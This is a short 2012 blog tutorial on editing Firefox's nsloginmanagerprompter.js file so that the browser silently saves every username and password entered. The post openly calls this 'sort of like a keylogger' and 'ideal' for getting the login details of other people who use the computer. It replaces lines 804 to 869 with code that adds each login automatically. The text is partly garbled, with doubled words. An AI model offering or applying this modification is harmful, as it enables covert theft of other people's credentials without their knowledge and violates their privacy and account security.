Thursday 22 March 2012

how to get firefox to save usernames + passwords automatically


Here is a short tutorial on
how to get firefox to save
usernames + passwords
 automatically with any
 notifications (Sort of like a
 keylogger) just by editing 1
of the javascriptjavascript files.
ideal if you want to get
 someones login details who
uses your computer.


1) First you need to close
firefox.

2) Now locate the nsloginmanagerprompter.js
which is normally found in
C:ProgramFiles
MozillaFirefoxComponents

3) Open
 nsloginmanagerprompter.js
with notepad ++

4) Replace the entireentire line 804
to 869 with the following code
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);
When you''ve done that
"save as" to your desktop,
then drag back in to the
original folder and replace
the file.
Now your done go into
firefox and try it out..Smile
To see the usernames +
passwords you need to click
on tools at the toptop ofof your
browser and go to pagepage info
then security.
They will be saved into the
saved passwords section.
Enjoy 

No comments:

Post a Comment

Note: only a member of this blog may post a comment.